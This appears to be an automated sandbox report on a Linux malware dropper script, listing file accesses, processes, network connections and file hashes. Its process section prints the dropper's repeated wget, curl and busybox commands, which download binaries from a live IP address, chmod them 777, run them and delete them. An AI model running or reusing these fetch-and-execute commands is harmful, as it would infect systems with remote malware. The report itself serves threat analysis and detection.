File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /usr/bin/curl N/A
File opened for modification /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /usr/bin/curl N/A
File opened for modification /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /usr/bin/curl N/A
File opened for modification /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /usr/bin/curl N/A
File opened for modification /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /usr/bin/curl N/A
File opened for modification /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /usr/bin/curl N/A
File opened for modification /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /usr/bin/curl N/A
File opened for modification /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /usr/bin/curl N/A
File opened for modification /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /usr/bin/curl N/A
File opened for modification /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /usr/bin/curl N/A
File opened for modification /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /usr/bin/curl N/A
File opened for modification /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /usr/bin/curl N/A
File opened for modification /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /usr/bin/curl N/A
File opened for modification /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /usr/bin/curl N/A
File opened for modification /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /usr/bin/curl N/A
File opened for modification /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /usr/bin/curl N/A
File opened for modification /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /usr/bin/curl N/A
File opened for modification /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /usr/bin/curl N/A
File opened for modification /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /usr/bin/curl N/A
File opened for modification /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /usr/bin/curl N/A
File opened for modification /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /usr/bin/curl N/A
File opened for modification /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /usr/bin/curl N/A
File opened for modification /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /usr/bin/curl N/A
File opened for modification /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /usr/bin/curl N/A
File opened for modification /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /usr/bin/curl N/A
File opened for modification /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /usr/bin/curl N/A
File opened for modification /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /usr/bin/curl N/A
File opened for modification /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /usr/bin/curl N/A

Processes

/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh

[/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/chmod

[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ

[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/rm

[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/usr/bin/wget

[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/chmod

[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7

[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/rm

[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/wget

[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/chmod

[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP

[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/rm

[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/wget

[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/chmod

[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM

[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/rm

[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/wget

[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/chmod

[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9

[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/rm

[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/wget

[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/chmod

[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W

[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/rm

[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/wget

[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/chmod

[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p

[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/rm

[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/wget

[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/chmod

[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm

[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/rm

[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/usr/bin/wget

[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/chmod

[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5

[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/rm

[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/wget

[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/chmod

[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU

[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/rm

[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/wget

[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/chmod

[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf

[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/rm

[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/wget

[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/chmod

[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO

[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/rm

[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/wget

[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/chmod

[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm

[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/rm

[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/wget

[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/chmod

[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX

[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/rm

[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/wget

[wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/chmod

[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W

[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/bin/rm

[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]

/usr/bin/wget

[wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/chmod

[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9

[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/bin/rm

[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]

/usr/bin/wget

[wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/chmod

[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm

[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/bin/rm

[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]

/usr/bin/wget

[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/chmod

[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5

[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/rm

[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/wget

[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/chmod

[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU

[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/rm

[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/wget

[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/chmod

[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf

[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/rm

[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/wget

[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/chmod

[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO

[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/rm

[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/wget

[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/chmod

[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p

[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/rm

[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/wget

[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/chmod

[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX

[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/rm

[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/wget

[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/chmod

[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm

[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/rm

[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/wget

[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/chmod

[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7

[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/rm

[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/wget

[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/chmod

[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP

[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/rm

[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/wget

[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/chmod

[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM

[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/rm

[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/wget

[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/chmod

[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ

[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/rm

[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
